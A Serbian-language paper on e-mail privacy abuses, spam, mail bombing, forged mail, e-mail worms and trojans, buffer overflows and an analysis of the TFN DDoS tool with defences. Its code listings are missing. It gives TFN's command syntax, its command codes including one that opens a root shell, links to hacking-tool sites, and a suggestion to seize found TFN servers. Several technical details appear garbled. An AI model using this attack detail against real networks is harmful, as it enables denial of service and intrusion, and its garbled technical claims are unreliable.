AOL je to učinio kada je dao podatke o mlađem podoficiru Timotiju Mek Veitu. Ti podaci su sadržali podatke o njegovom seksualnom opredeljenju (to da je on homoseksualac i da je posetio određene sadržaje na interenetu i da je bio u kontaktu sa određenim brojem homoseksualaca). Americka mornarica je tražila te podatke i iskoristila ih da bi ga otpustila. Mek Veit je podigao optužnicu protiv AOL-a zbog napada na privatnost, ali su oni nastavili da brane svoj postupak i svoje pravo da koriste podatke na način kako su im potrebni.*

Ono što je bito u svim ovim slučajevima da se svi ti podaci daju bez njihovog znanja  i samim tim bez njihovog pristanka.Te podatke zatim dalje mogu da koriste i razne druge agencija,službe i slične organizacije. Čak je na pojedinim mestima omogućeno pojedincima da lako dođu do svih relevantnih podataka o drugom pojedincu.

Poseban problem kod e-mail poruke je u tome što u osnovi daje previše podataka o onome koji je šalje. Iz nje se može zaključiti odakle je poslata, iz koje zemlje, ko je pošiljalac, u koje vreme je poslata, preko kojih je sve servera prošla dok nije stigla do određene destinacije.

Teško je izbeći kriminal koji je vezan za elektronsku poštu, pošto je lako pratiti rad korisnika na sistemima sa PINE programom za pristup pošti, probijati kodiranu zaštitu moćnim i lako dostupnim softverom i ubacivati se u sisteme sa alatima koji su dostupni na internetu:

SpyNet (pages.prodigy.com/waite/waite1.htm#SpyLinks) ili Hacking Arcade (www.angelfire.com/ak/ankit1). Kodiranje je mogućnost, ali ako neko stvarno želi da čita vaše poruke moze veoma lako da ih dekodira sa odgovarajućim softverom.

Trenutno američko zakonodavstvo manje pažnje polaže na privatnost nego na praćenje toga šta ljudi pišu, kome i koliko često. To može da izgleda neophodno u nekim slučajevima, kao sto je slučaj Džejka Bejkera.

Džejk, student, je uhapšen zato što je poruka koju je poslao sadržala "komunikaciju na međudržavnom ili međunarodnom nivou koja sadrži pretnje, sa ciljem da se ponizi tuđa ličnost".

Očigledno imate pravo da šaljete takve poruke, ali uz rizik da budete nadgledani, ispitivani i javno poniženi. Nameće se pitanje: šta to prosečan korisnik elektronske pošte piše kada je potrebno da se to nadgleda od strane vlasti.

U 42 države SAD sudski ovlaštene institucije mogu legalno da čitaju tuđu postu (www.crimetime.com).

U Vašingtonu je zakonom zabranjeno slanje anonimnih poruka iako je to veoma lako izvesti pa većina ljudi nije uhvaćena u tome. Pristup elektronskoj pošti je omogućen ogromnom broju ljudi, i treba ga koristiti sa oprezom.


Propaganda u komercijalne svrhe
 
AOL je podatke o korisnicima distribuirao i kompanijama. Podatke je prodavao marketinškim firmama putem mailing lista. Ovo nije kršenje zakona, iako su veoma specifične informacije prodate, zato što AOL tvrdi da korisnici mogu da povuku svoje ime sa liste u bilo koje vreme, samo ako to žele. Ali, ako neko ne zna da su njegovo ime i podaci prosleđeni marketinškim kompanijama, kako može da odluči da povuče svoje podatke.

Preko 70% kompanija daje lične podatke o svojim zaposlenima raznim kreditnim žirantima, 47% daje agencijama za izdavanje stanova i 19% raznim dobrotvornim organizacijama.

U zloupotrebu elektronske pošte spada i takozvano "spam"-ovanje. To predstavlja slanje velikog broja jedne poruke većem broju osoba od strane jednog pošiljaoca(najčešće su te poruke neka vrsta oglasa za proizvod ili uslugu koju pošiljalac želi da nam proda).

Problem SPAM-a spada u oblast Net-etike - kulture ponašanja i komunikacije na Internetu. Šta je dozvoljeno i u kojoj meri često se ne zna - baš kao i u realnom životu. Poruke koje svaki email korisnik svakodnevno prima mogu biti zaista iritirajuće, kako po svom sadržaju tako i samim znanjem da te poruke nismo tražili, te da nas neko koristi kako bi izvukao neku korist. Postojanje zakona je svakako jedan od načina zaštite korisnika i provajdera. Mnogi provajderi  vode računa o pošti koju distribuiraju do krajnjih korisnika, ali ima i onih koji ostavljaju korisnicima da se sami izbore.

Specifičan način spam-ovanja je slanje puno e-mailova  na određenog korisnika.

Na taj način se osim zatrpavanja "mete" beskorisnim porukama, zauzimaju resursi računara koji se koristi za slanje ili primanje tih poruka, pa moze doći i do blokiranja ili čak do oštećenja samog sistema.

Primer za to se video prilikom NATO bombardovanja Jugoslavije gde su određeni serveri koji su prikazivali web prezentacije o NATO-u bili onesposobljeni primanjem preko 20.000 email poruka svakog sata. U jednom trenutku sam server više nije imao mesta gde da primi tolike poruke i srušio se usled nedostatka mesta za snimanje privremenih podataka neophodnih za rad sistema.

Ovaj vid zloupotrebe je danas dostupan ne samo "velikim hakerima", već i običnim korisnicima Interneta. Danas 30% populacije na Internetu ima po neki program koji omogućava ovakvo bombardovanje nekoga gomilom poruka, jer se mogu naći na Internetu i veoma su jednostavni za upotrebu.



Lažno predstavljanje putem elektronske pošte

Postoji još jedan važan aspekt, a to je da elektronska pošta nije realna, već virtualna konverzacija, i kao takva može biti loše interpretirana i shvaćena na pogrešan nacin. To dolazi do posebnog izražaja ako se neovlašćeno koristi od treće strane.

Dodatni način zloupotrebe e-maila predstavlja slanje "fake-mail"-ova. U pitanju je slanje poruka tako da izgleda da ih je poslao neko drugi. Najčešće se jedino iz zaglavlja poruke može otkriti da poruku nije poslao onaj čije ime piše u poruci, tako da ako ne očekujete suprotno, možete da pomislite da je poruku poslao onaj u čije je ime poslata.

U te svrhe se može iskoristiti najobičniji mail program kao što su "Outlook Express", "Internet Mail", "Eudora", "Netscape Messager" ili je potrebno samo malo predznanja o radu samih mail servera i operativnog sistema linux.

Primer jedne poruke koja na prvi pogled izgleda normalno:

----------------------------------------------------------------------------------




U stavci Received vidi se da je mail stvarno poslat preko mail servera na amadeusu i to tako što je poslat mail sa njega samog(localhost). Kada se primi jedan ovakav mail potrebno ga je poslati nazad na abuse@imeprovidera_odakle_je_mail ili root@imeprovidera_odakle_je_mail sa konstatacijom da je mail lažan i da tražite od administratora sistema da reaguje na zloupotrebe mail servera.



Korišćenje e-maila kao oblik distribuiranog napada
 
Mail bombardovanje je veoma primitivna tehnika, pa se gotovo više i ne koristi. Skoro svi provajderi imaju zaštitu od mail bombi (server odmah zaustavi mailove ako primeti da dolaze iste poruke) a i krajnja zaštita je jednostavna - za manje od 5 minuta ćete ih obrisati, dok će zlonamerni korisnik potrošiti sate i sate da bi vam poslao par hiljada poruka.

Zbog toga se koristi nova tehnika, a to je slanje emaila koji može naneti (i obično donosii)  veliku štetu. Radi se slanju trojanca ili virusa uz email u kojem se zlonamerni korisnik predstavlja kao veoma dobrotvorna osoba i neprimetno  moli primaoca da startuje 'program' koji mu  je poslao. Program je najčešće zaražen nekom vrstom virusa među koje najčešće spadaju

BackOrifice i NetBus, dva najpopularnija trojanca (analogija izvedena po tome što zlonamernom korisniku dozvoljava da se bez znanja vlasnika računara “useli”  na zaraženi računar i time zlonamernom korisniku dozvoli nelegalan pristup računaru) koji kreiraju takozvani backdoor (eng. backdoor – zadnja vrata).

Pored trojanaca opasnost predstavljaju i virusi koji se šire putem emaila, tzv. crvi. Takvi virusi prate kome sve žrtva šalje pisma, i uz njihove emailove prikače i svoju kopiju, tako da primalac pisma dobije virus od svog prijatelja.

Zato je potrebno biti obazriv kada se prima mail poruka sa prikačenim programom. Posebno treba obratiti pažnju na dva nova tipa crva, a to su crvi iz porodice takozvanih 'VBA crva' čiji je predstavnik sada već čuveni crv 'I-LOVE'YOU' i crvi iz porodice 'ActiveX crva' koju predstavlja crv 'BubbleBoy'.

VBA crvi koriste posebnu tehniku kako bi zavarali potencijalnu žrtvu. Pored toga što crv nema ekstenziju EXE već VBA ili VBS (što znači da su pisani u Visual Basic Script formatu i da je za njihovo izvršavanje potreban IE), takvi crvi se obično distribuiraju sa extenzijom '.txt.vba', tako da potencijalna žrtva pomisli da se radi o običnom tekstu i startuju fajl. Pošto je zadnja ekstenzija '.vba', ne startuje se Notepad već IE koji izvrši program, tako da potencijalna žrtva postane prava žrtva.

Posle crva 'I-LOVE-YOU', koji se širi sa fajlom 'LOVE-LETTER-FOR-YOU.TXT.vbs', pojavilo se još nekoliko stotina prepravljenih verzija ovog crva, među kojima je i srpska verzija koja se zove 'Volim i ja Vas.txt.vbs'.

Specijalna vrsta zlonamernih email poruka su poruke koje koriste Java/ActiveX aplete da bi ubacili trojanca ili obrisali fajlove po disku. Aplet koji nosi takvo jedno pismo se izvrši čim ga korisnik otvori, tako da nije više ni potrebno da startujete prikačeni fajl - on se sam startuje!

Takav email može (bez startovanja pomoćnog EXE fajla) brisati fajlove, kopirati, i kreirati nove, prosto rečeno, aplet ima sve privilegije i može se 'ugnjezditi' u sistem, kako bi kasnije preduzeo neke nove akcije.

Takav jedan aplet nosi crv 'BubbleBoy' koji se kao i svi crvi širi putem emaila. Dovoljno samo da neoprezni korisnik otvori e-mail i postaće žrtva koja će svojom nepažnjom poslati kopiju crva na još nekoliko stotina emaila.

To je samo jedna mogućnost ovakvih mail poruka. Naime, taj aplet može startovati prikačeni fajl, koji će u ovom slučaju preuzeti punu kontrolu nad računarom primaoca i otvoriće zlonamernom korisniku  'zadnja vrata'.



Neovlašćeno ulaženje na računarski sistem

Neovlašćen pristup računarskom sistemu se najčešće svodi na korišćenje i zloupotrebu neke vrste sigurnosne rupe u samom sistemu.

Najčešće se to svodi na pravljenje i korišćenje exploita (programi pisani da iskoriste postojanje sigurnosne rupe u nekom sistemskom programu i dozvole onom ko je pokrenuo exploit da dobije neovlašćene privilegije na sistemu)

Najčešće korišćena metoda prilikom pravljenja exploita je klasičan buffer overflow.

Naime buffer overflow je prepunjavanje buffera i pisanje po prostoru po kom ne bi smelo da se piše u normalnim okolnostima. Ali šta se time dobija? Šta se može postići?

Evo i prostog programa koji u sebi sadrži klasičan buffer overflow:



Svaka funkcija koja se poziva mora da se vrati na mesto svog poziva.To se radi tako što se pri pozivu funkcije sa instrukcijom call na stacku sačuva EIP koji će se na kraju funkcije pokupiti i vratiti na mesto poziva.

Kako je main() funkcija i ona će biti pozvana (disass _start) i njen EIP će biti sačuvan negde na stacku. Na samom kraju funkcija nalazi se instrukcija ret koja će sačuvan EIP sa stack-a da pokupi i da se na taj način vrati odakle je pozvana. Međutim zbog specifičnosti samog rada sa memorijom i rada sa stackom (stack na i386 raste na dole) situacija u kojoj bi string bio veći od prostora koji smo mu dodelili definišući mu buffer (u ovom slučaju 256 byte) izazvao bi rušenje integriteta memorije jer bi preostali deo stringa (preko 256 byte) prepisao u memoriji i mesto gde je zapisan EIP ispuniti string karakterima i time izazvati pad programa kada na kraju funkcija pokrene ret da u EIP upiše string karaktere.  Međutim, ako u EIP namerno upišemo adresu shell coda (tačnije prepuni buffer sa shell codom i čekamo da ga ret pokupi)   i rezultat pada programa biće novi shell koji će se pokrenuti. Ako je program bio SUID (imao privilegije super korisnika (Super User ID)) dobićemo privilegije root-a na toj mašini i samim tim postati korisnik sa administratorskim privilegijama. Primer jednog klasičnog exploita koji se može koristiti na sistemima Sun Solaris kojim korisnik koji ga pokrene dobija efektivni root access.




U skorašnje vreme postoji programski paket pod imenom “libsafe” (http://www.research.avayalabs.com/project/libsafe/) koji služi za zaštitu kritičnih elemenata stack-a za svaki program koji je startovan unutar operativnog sistema baziranih na UNIX platformama .”Libsafe” radi na principu terminacije, odnosno ukoliko dođe do prepisivanje stack-a “libsafe” automatski terminiše odnosno nasilno isključi taj program. Jedina mana paketa “Libsafe” jeste što je ograničen na UNIX platforme, što platforme tipa WINDOWS ostavlja u oskudici.

DDOS pojam

Distribuirani DOS, kao i bilo koji distribuirani koncept predstavlja način kako pokrenuti određenu proceduru sa nekoliko računara. U ovom slučaju to je uskraćivanje servisa (denial of service) u formi preplavljivanja paketima, a u cilju opterećivanja mreža odnosno linkova radi njihovog onesposobljavanja. DDOS ne predstavlja kategoriju alata za hakovanje već način razmisljanja. Međutim kao i svaki informatički koncept propraćen je alatima koji opravdavaju ovaj način razmisljanja. DDOS alati predstavljaju PENETRACIONE alate , oni ne eksploatišu sigurnosne rupe odnosno ranjivosti ali mogu da ispitaju koliku količinu saobraćaja jedan računar, mreža mogu ili ne mogu da podnesu. DDOS se već duže vreme koristi od strane profesionalnih konsultanata za sigurnost kao sredstvo za testiranje izdržljivosti mreža. Pre nego što su izašli DDOS alati, postojali su komercialini alati koji su mogli da pokrenu takozvano distribuirano preplavljivanje paketima. Ti alati su korišćeni u okviru preduzeća koja se bave sigurnošću da bi mogli da primene sigurnosni servis  koji se naziva ?Capacity Management?. Svrha ?Capacity Management? je da se utvrdi koliku količinu saboraćaja može da podrži jedna mreža, i da se utvrdi da li se propusna moć mete u ovom slučaju mreže koja se testira mora poboljšati ili da li ona može da izdrži tu količinu saobraćaja a pri tome da može da pruža usluge koje se nalaze na toj mreži odnosno meti.



Za šta se DDOS može koristiti ?

On može da preoptereti  mrežne linkove. On šalje bezsmislene pakete, pri čemu je količina paketa i suviše velika da bi neka mreža mogla to da primi i obradi, tako da je jedino za šta se može koristiti DDOS jeste onemogućavanje pristupa mreži i samim  uslugama koje ta mreža pruža.

Skorašnji primer DDOS napada izvod iz “BLICA”

Napadnut “Telekomov” link

Kada je podignuta cena impulsa, grupa nezavisnih hakera je počela da pretražuje „Telekomov“ link, vršeći smurf ili tzv. DDOS napad. Time prekidaju njihov link i nanose im ogromnu štetu, jer ih onemogućavaju u komunikaciji. Napad ide preko servera iz inostranstva, na primer u Papua Novoj Gvineji, sa Sejšela i slično, zbog čega „Telekom“ ne može da im uđe u trag. Mi se od toga ograđujemo, ali to govori o nezadovoljstvu korisnika Interneta i o kontraefektima poskupljenja



Kako on radi ?

Osnovna ideja je da se instalira ogromna količina DOS servera na različitim računarima, koji čekaju komande od centralnog klijenta. U trenutku kada centralni klijent da komandu da generišu onoliko saobraćaja koliko to želi napadač i usmere ga ka jednoj mreži, alat distribuira komande serverima da generisan saobraćaj puste ka određenoj mreži i na taj način otpočnu uskraćivanje usluga. Iz ovih razloga se ovaj metod naziva distribuirano uskraćivanje usluga. Pre nego sto su ovakvi alati napravljeni onaj koji napada ili onaj koji testira mrežu u cilju zastite od takvih napada je morao da se telnetuje na sve masine sa kojih želi da izvrši napad ili da izvrši testiranje mreže i manuelno da otpočne napad na željenu mrežu koristeći UNIX komandu ping2 -f mreža.
                                                                                                                                                                                                                   

Detaljan opis DDOS alata (TFN project)
 

U ovom delu je data analizu "Tribe Flood Network" alata ili popularnije nazvanog "TFN", koji je kreirao “Mixter”. TFN se trenutno  razvija i testira na mnogobrojnim kompromitovanim računarima bazarianih na Unix sistemima.
               
TFN je sastavljen na principu klijent-server tehnologije koji se implementuje kao alat za distribuirano uskraćivanje usluga.Kao takav sposoban je da izvršava sledeće oblike napada:
 
•               ICMP flood
•               SYN flood
•               UDP flood
•               Smurf
•               Pružanje “root konzole po zahtevu” na određenom portu
 
TFN serveri su prvobitno nađeni u binarnoj formi na Solaris 2.x sistemima, koji su indetifikovani kao kompromitovani sistemi,  exploatisani sa buffer overrun bagom u  RPC servisima "statd","cmsd" i "ttdbserverd". Ovaj  buffer overrun je opisan na CERT-ovom web sajtu incident  99-04:
 
http://www.cert.org/incident_notes/IN-99-04.html
 
U početku je postojalo verovanje da su ovi server korišćeni kao neki od programa koji služe za prisluškivanje ili za daljinsko upravljanje. Tokom istrage koristeći razne alate za analizu i zastitu od upada došlo se do zaključka da je ovo jedan od alata za distribuirano uskraćivanje usluga ,koji je baziran na  alatu trinoo koji takođe služi za distribuirano uskraćivanje usluga, a čiji se izvorni kod nalazio na jednom ukradenom nalogu koji je bio korišćen za bekapovanje logova.

Treba napomenuti da sem  TFN  i TRINOO postoje i drugi  alati kao na primer :
•                     stacheldracht (veoma sličan  alat TFN-u)
•                     papasmurf (koristi samo  smurf kao oblik napada)
•                     fraggle (koristi samo UDP flood kao oblik napada)
•                     winsmurf (koristi samo  smurf kao oblik napada win32 verzija)
•                     jolt (syn flood alat koji za razliku od prethodnih neradi  na principu klijent- server već je stand’alone alat)
               


Izvršni kod ("verzije 1.3 build 0053") TFN servera
 
Modifikacijom izvršnog koda može se promentiti bilo koji od detalja ove analize kao što su konzole šifre komande TCP/UDP portovi kao i podržani metodi napada.
 
U ovo slučaju oba dela TFN alata server i klijent su kompajlirani i pokretani sa Red Hat Linux 6.0 operativnog sistema.
 
Za analizu inicjalnog upada pogledaćemo strukturu jedne TFN mreže 
 
Mreža: napadač(i)-->klijent(i)-->server(i)-->Žrtva(e)
 
TFN mreža je  sastavljena od tribe klijent programa ("tribe.c") i tribe server programa  ("td.c") gde računari na kojima se instaliraju ovi serveri se podrazumevaju. 
 
   
Napadač(i) kontrolišu jednog ili više klijenata od kojih svako kontroliše više servera . Serverima je naloženo da koordinišu napad na jednu ili više žrtava, gde pod žrtvama podrazumevamo jedan ili više računara kao i jednu ili više mreža, od strane klijenata.
 


Komunikacija između klijenta i servera
 
Daljinsko upravljanje TFN mrežom otpočinje na komandnoj liniji. Izvršavajući tribe klijent program uspostavljamo konekciju na tribe servere jednom od brojnih metoda kao što su:
 
•               Klijent-server vezivanje bazirano na TCP protokolu;
•               Klijent-server vezivanje bazirano na UDP protokolu;
•               Klijent-server vezivanje bazirano na ICMP protokolu;
•               SSH konekcijama;
•               Telnet konekcijama.
 
Za vezivanje klijenta sa serverom nije potrebno imati šifru ukoliko nećete da mrežu koju ste oformili čuvate samo za sebe, mada je potrebno imati takozvanu “ip listu” koja sadrži spisak TFN servera sa njihovim Internet adresama.
 
Komunikacija između klijenta i TFN servera se ostvaruje sa  ICMP_ECHOREPLY paketima što znači da se  TCP  i UDP protokoli koriste   samo pri uspustavljnju konekcije a ne pri komunikaciji, razlog za to je što većina alata za monitoring ne prikazuju količinu ICMP_ECHOREPLY paketa koja prolazi kroz mrežu ili nemogu da vide šta se sadrži u paketu koji je baziran na icmp protokolu ,što monitoring između klijenta i servera skoro čini nemogućim sa standardnim alatima.
 
U prilogu A su prikazane zakrpe za verziju Sniffit  0.3.7.beta koja omogućava da prikaže  ICMP data segmente,i prilog B za zakrpe za “tcpshow.c” 1.0 da prikažu ICMP_ECHO i ICMP_ECHOREPLY identifikacione  i sekvencianlne brojeve.
 


Pokretanje klijent programa
 
Kada pokrenemo program bez ikakvih opcija dobijamo pomoćni ekran koji prikazuje komande koje su podržane od strane TFN-a i koji izgleda ovako:
 

U prvoj liniji “./tfn <iplist> <type> [ip] [port]” nam je dato sledeće:
 
•               iplist predstavlja numeričku listu TFN servera ili broadcast servera složenu po njihovim Internet adresama. U zavisnosti od toga kakva je vrsta napada koristimo određenu vrstu iplista .Ukoliko je vrsta napada SYN-flood,ICMP-flood ili UDP-flood u tom slučaju se  koriste liste  TFN servera ,a ako je vrsta napada Smurf tada se koriste TFN ili “broadcast liste”
•               type predstavlja prekidač koji određuje vrstu napada kao i tkz ”spoof protection” odnosno maskiranje polazne adrese ,određuje veličinu paketa i određuje dobijanje root-shella na određenom portu.
•               IP u ovom slučaju predstavlja odredišnu adresu odnosno metu. Meta može biti jedna ili više adresa odnosno metu može predstavljati jedan računar ili cela mreža.
•               port koristeći ovu opciju možemo odrediti obaranje nekog određenog sevisa koji se korist na jednom računaru kao naprimer port  80 za web ,port 25 za mail, portovi 6667-7000 za irc itd. Ukoliko želimo da zagušimo saobraćaj onda se portovi randomno određuju u rasponu od 0-65535.
 
               Ukoliko smo se odlučili za računar ili mrežu i odlučili za vrstu napada podesivši ove parametre koje ovaj program zahteva možemo otpočeti napad na željenu mrežu.Veoma je mali broj mreža danas na internetu koje su uspele da se odbrane od ovakvih vidova napada.Jedini razlozi za neuspelost odbrane od ovakvih napada jeste neshvatnje ovog problema kao ozbiljnog i količina novca koja se ulaže u sigurnost jedne mreže.
 


Zaštita šiframa
 
               Pošto klijent nije zaštićen šifrom za pristup svaka komanda koja se šalje serverima nije šifrovana .Da bi se postigao neki vid enkripcije odnosno zaštite šifrom komande su poslate u vidu 16-to bitnih brojeva koje su sakrivene u indetfikacionom polju ICMP_ECHOREPLY packeta.Broj ove sekvence je konstanta 0x0000, koji liči kao odgovor na standardnu ping komandu.
 
Ovo je primer standardnog  "config.h"  fajla koji ide uz TFN paket.
 
               Kao što se vidi u ovom primeru "config.h" svi brojevi u srednjoj koloni predstavljaju šifre za pokretanje određene vrste napada te je preporučljivo da se ti brojevi menjaju ukoliko želite da zaštite vašu TFN mrežu da neko sem vas samih nemože da koristi komande ukoliko je ta mreža napravljena kao sredstvo koje bi služilo da se proveri propusni opseg same mreže na kojoj se takva vrsta servisa  nalazi.



Tragovi (Fingerprints)
 
               Kao i sa trinoo paketom, metodi za instaliranje klijent/server TFN programa su isti kao i kod vecine UNIX/LINUX operativnih sistema sa svim standardnim opcijama za sakrivanje programa i njegovih pratecih fajlova.
 
               Oboje klijent i server moraju biti pokrenuti sa superuser (root) privilegijama iz razloga sto koriste neke kernel datoteke koje samo superuser može da koristi.
 
               Skorašnje instalacije TFN servera uključuju stringove koje indiciraju da je autor istoimenog paketa uključio i enkripcione module poput modula BLOWFISH koji omogućuje da se enkriptuju ip liste servera što detekciju samih TFN server čini težom
 
Primer stringova koji su uključeni unutar skoro nađenog  TFN servera na univerzitetu u Washingtonu
 
                                                             

Ukoliko pratimo mrežni saobraćaj korsteći paket snffit modifikovan sa zakrpom (zakrpa predstavlja izmenu u programu sa kojom se dobijaju neke dodatne opcije koje prvobitno nisu ugrađene) iz priloga A radeći komandu "ping -c 3 10.0.0.1" koja šalje tri ICMP_ECHO paketa, i čeka na ICMP_ECHOREPLY odnosno odgovor  izgleda ovako:
                               

Ovde možemo primetiti da se paketi sa istom vrednošču poslati kao ICMP_ECHO paketi na odredište i sa odredišta se vraćaju na polaznu tačku u obliku ICMP_ECHOREPLY paketa sa takođe istom vrednošću, stim sto se brojevi svake sekvence koje su prikazani kao bajt 7 i 8 povećavaju sa svakim sledećim paketom

Koristeći istu komandu ping –c ali sada gledajuči protok na mreži sa paketom tcpdump/tcpshow modifikovan sa zakrpom iz priloga B dobijamo ovakav izgled:
               

Ovde se primećuje da se broj sekvence povećava takođe za jedan počevši od ofseta odnoso inicijalnog paketa čiji je sekvencni broj 0X000.

Za razliku od standardne ping komande za koju smo rekli da koristi ICMP_ECHO-ICMP_ECHOREPLY pakete, TFN klijent šalje komade koristeći samo ICMP_ECHOREPLY pakete umesto da koristi ICMP_ECHO pakete. To je urađeno iz razloga da bi se kernel računara na kome se nalazi TFN server srečio da odgovara sa ICMP_ECHOREPLY paketima a ukoliko server treba da šalje odgovore on to radi takođe ICMP_ECHOREPLY paketima. Ovakav vid komunikacije između klijenta i servera se razlikuje od standardnog ICMP_ECHO-ECHOREPLY oblika komunikacije i na taj način se može ući u trag postojećim TFN serverima na mreži.
ICMP_ECHOREPLY identifikaciono polje sadrži komande odnosno 16 bitne vrednosti koje su konvertovane u raspored bajta i teksta u ASCII modu
 
Ovo je primer šta napadač vidi kada izda komandu da se otvori konzola na portu 12345.



Isti slučaj ali kombinacijom tcpdump/tcpshow alatom



Ono što je ovde očigledno jeste da klijent šalje komandu 0x01C8 (decimalno 456) u identifikacijonom polju praćena sa brojem sekvence  0x0000 koje se ovde nemenja terminisana NULL ASCII stringom "12345" (koja određuje port)
 
Server odgovara komandom 0x007B (decimalno 123) u identifikacijonom polju,propraćenu brojem sekvence 0x0000,a zatim terminisana NULL ASCII stringom "shell bound to port 12345\n".U tom trenutku se ovaj string ispisuje na konzoli sa IP adresom servera.
 


Lokalna Odbrana
 
Iz razloga što programi koriste ICMP_ECHOREPLY pakete za komunikaciju biće veoma teško ako ne čak i nemoguće da se takva vrsta saobraćaja blokira, a da se pri tom neblokiraju većina internet programa koja se oslanjaju na ICMP. 
Jedini siguran način da se ugase ovakvi kanali komunikacije jeste da se zabrani sav ICMP_ECHO saobraćaj unutar jedne mreže, inače će se na velikim mrežama strašno teško razlikovati noramlan ICMP_ECHO i ICMP_ECHOREPLY saobraćaj koji se ostvaruje od strane programa poput programa ping od saobraćaja koji se ostvarju koriščenjem ovog i njemu sličnim alatima.
 



Slabosti
 
Ukoliko izvršni kod nije menjan TFN klijenti i serveri se mogu identifikovati   posmatrajući stringove uključene u binarnom zapisu programa, koji izgledaju ovako:
 

Novije verzije TFN klijent/server programa pokazuju postojanje novih kodova za multi-klijent okruženje umesto jedno klijentskog okruženja koje je zasada veoma zastupljeno, Takođe su primećeni i neki novi moduli za enkriptovanje iplista .Nove verzije istog programa pokazuju na postojanje i upotrebu Berkeley "rcp" komande za komunikaciju. Nadgledajući "rcp" konekcije (514/tcp) sa raznih sistema na jednoj mreži može se na nalozima korisnika u direktorijumu ~/.rhosts mogu se videti ostvarene konekcije sa rcp serverima sa naloga koji je posmatran i na taj način zaustavimo mrežu da bude korišćena kao sredstvo nekog napadača.
 
Pošto TFN kao što je već napomenuto koristi ICMP pakete, mnogo ih je teško detektovati u akciji i takvi paketi mogu da prođu kroz većinu firewall-ova, a programi poput ngrep-a nisu u stanju da ih detektuju.
 
Jedina slabost TFN-a jeste da nepostoji autentikacija izvora ICMP paketa bar ne u analizi postojećih verzije TFN programa. Ukoliko vrednosti komandi nisu menjane samo jedžan paket bi bio dovoljan da ustanovimo postojanje TFN servera na jednoj mreži .
Koristeći Perl skriptu "civilize" datu u prilogu C, a koja koristi Net::RawIP delove TCP protokola, može se ustanoviti postajnje TFN servera. Obelodanjivanjem ovakve vrste servera na jednoj mreži možemo uraditi sledeće: nastojati da TFN program uklonimo sa mreže ili da koristimo TFN za svoje potrebe. Ukoliko su komande menjane može se pokrenuti nad TFN serverom takozvani "brute force attack” koji se sastoji od slanja kombinacije tri broja koji služe za izdavanje komandi i na taj način možemo uspostaviti kontrolu nad njim.
 
 

 
               
Primetno je da se u radu govori samo o tome kako sam napad izgleda i kako se može sprečiti da jedna mreža može da bude posrednik u napadu. Jedino što nije rečeno jeste kako sprečiti da budemo žrtve takvog napada, te će se o tome govoriti u ovom zaključku.
 
Kao što je već rečeno DDOS napadi koji dolaze u različitim oblicima kao što su smurf, syn-flood, fraggle, itd. predstavljalju u osnovi isporuku ogromne količine paketa ka jednoj odredišnoj adresi odnosno jednoj mreži, tako da se slabost jedne mreže manifestuje u njenom propusnom opsegu  odnosno u količini paketa koju ona sama može da procesira .U ovom slučaju će mo govoriti  o smurf ili icmp-flood tipu napada. Pošto DDOS koristi ICMP kao osnovni protokol kako za komunikaciju tako i za distribuciju svojih mailicioznih paketa, većina administratora mreža pokušavaju da na ulaznim tačkam ka svojoj mreži  kompletno ili delimično zatvore  ICMP saobraćaj da bi se zaštitili od ovakve vrste napada , a pri tome nemaju u vidu da bez obzira na to što saboraćaj neće proći unutar njihove mreže on ipak dolazi na ulaznu tačku i tu pravi gužvu, odnosno onemogućuje da se bilo koji drugi saobaraćaj odvija  na toj mreži.

Rešenje za ovakvu vrstu DDOS (icmp-flood,smurf) napada jeste ustvari da se takva vrsta saobraćaja pusti kroz ulazne tačke , tačnije da se odvoji deo propusnog opsega na ulaznim tačkama koji će služiti za ICMP saobraćaj .To je najlakše uraditi sa softverom koji se nalazi na novijim verzijama operativnog sistema za rutere pod imenom CAR (confirmed acces rate) koji omogućava da se odvoji određen procenat opsega  za  ICMP (burst -saobraćaj), tako da nam preostali deo opsega služi za ostali saobraćaj (http://www.cisco.com/warp/public/784/packet/apr99/1.html) .

Druga vrsta DDOS napada SYN ili ACK-flood je veoma sličan smurf napadima jer kao i on predstavlja isporučivanje ogromne količine paketa na jednu mrežu, s tim što se paketi u ovom slučaju šalju na oderdišnu adresu ali i na različite portove tog računara ili rutera koji stoji iza te adrese. Još jedna specifičnost za ovu vrstu paketa jeste sama konstrukcija paketa.Kod SYN ili ACK-flooda nešalju se kompletni paketi već samo neki njegovi delovi kao što je syn koji predstavlja samo započinjanje  konekcije ili ack deo paketa koji predstavlja samo prvi pristanak na započetu konekciju.Ukoliko se takve vrste paketa šalju ,uređaj koji ih prima nezna šta da radi sa njima, pa se kod tog uređaja manifestuje takozvano “zamrzavanje” odnosno onesposobljavanje samog uređaja za rad usled nepropisno  primljenih paketa ili ukoliko je sam uređaj otporan na takve vrste napada dolazi kao i u prvom slučaju do zagušenja na samoj mreži gde se taj uređaj nalazi.

Rešenje za ovakvu vrstu napada je da se na ulazne tačke mreže postave ruteri koji imaju mogućnost prepoznavanja paketa, odnosno da prime samo one pakete koji su kompletni a sve ostale da odbaci odnosno da kaže udaljenoj mašini koja šalje takvu vrstu paketa da prestane. To se radi na taj način što se na ruterima u samo IP-stacku (odvojeno mesto u memoriji računara ili uređaja koji  aktivno ušestvuju u mrežnoj komunikaciji za rad sa mrežnim protokolima baziranim na TCP-protokolu) zadaje komanada “ip-revers-unicast” koja omogućuje da se takav vid zaštite sprovede, odnosno ona omogućava da se primaju samo kompletni paketi.
 Rešenje koje je Yahoo primenio na svojoj mreži
 
Na ulaznim tačkama svoje mreže postavio je 4 rutera sa gigabitnim ulazima na kojima je sproveo ove gore navede mere zaštite i iza njih je stavio nekoliko mašina koji služe kao “amortizeri” odnosno  koje će da loguju sve konekcije koje su ostvarene prema Yahoo-voj mreži .Jedini problem koji preostaje Yahoo da reši jesu sami sigurnostni propusti u kros-sajt skriptingu, što ne ulazi u temu ovog rada.
                               
Da zaključimo, bez obzira na ove date mere zaštite nemoguće je odbraniti se od DDOS napada ukoliko nije zadovoljen osnovni uslov, a to je da se veličina propusnog opsega mora konstantno povećavati do granice finansijske mogućnosti korporacije ukoliko je njoj cilj da se zaštiti od istih.
 



Zakrpa za sniffit v. 0.3.7.beta za prikaz ne standardnih ICMP podataka
 
 



Perl skripta "civilize" za kontrolu TFN servera
 


--------------------------------------------------------------------------------

1. Telnet - servis koji omogućava terminalni pristup računarima zasnovanim na UNIX platformama.
2. Ping – (paket internet groper), služi kao alat za proveravnje veze između dva računara, gde je veza  zasnovana na TCP/IP protokolu.

Jos tehnika za napad:



1. Pogadjanje TCP/IP paketa koji cirkulisu izmedju servera i clienta na mrezi;

2. Napadi sa sniferima.




